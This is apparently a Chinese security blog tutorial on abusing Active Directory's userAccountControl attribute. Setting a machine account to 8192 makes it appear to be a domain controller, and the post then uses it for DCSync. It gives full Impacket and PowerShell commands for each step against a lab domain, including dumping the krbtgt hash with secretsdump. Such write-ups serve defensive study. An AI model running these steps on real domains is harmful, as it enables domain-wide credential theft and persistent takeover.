文章目录
User-Account-Control(bf967a68-0de6-11d0-a285-00aa003049e2)简介
机器账户的User-Account-Control属性将其修改为8192,活动目录就会
认为这个机器账户是域控之后就可以进行Dcsync操作了,8192对应了
ADCS_UF_SERVER_TRUST_ACCOUNT微软标志位的解释是域中成员域控的机器账户。
微软文档地址:
https://learn.microsoft.com/en-us/windows/win32/adschema/a-useraccountcontrol
User-Account-Control(bf967a68-0de6-11d0-a285-00aa003049e2)利用
利用步骤简述:
1.新增机器账户。
2.通过域管或企业管理员对新增机器账户修改User-Account-Control值为8192(0x2000H)。
3.通过新增机器账户进行Dcsync操作。
利用步骤1(Impacket):
python3 addcomputer.py -computer-name 'hackmachine' -computer-pass 'Pass@123' -dc-ip 10.211.55.100 'test/yuguan:Password6666' -method SAMR -debug
利用步骤2(powershell):
域空不需要安装普通成员机器需要安装
Install-Module -Name ActiveDirectory -Scope CurrentUser
修改属性
$ADComputer= Get-ADComputer -Identity hackmachine
Set-ADObject -Identity $ADComputer -Replace @{userAccountControl=8192}
利用步骤3(Impacket):
python3 secretsdump.py test/hackmachine$:Pass@123@10.211.55.100 -just-dc-user krbtgt
总结
User-Account-Control属性滥用可以将普通机器账户修改为称为域控,
并拥有Dcsync功能导出用户Hash,DCShadow是创建恶意域控然后利用
域控间正常同步数据的功能将恶意域控上的恶意对象同步到正在运行的
正常域控上。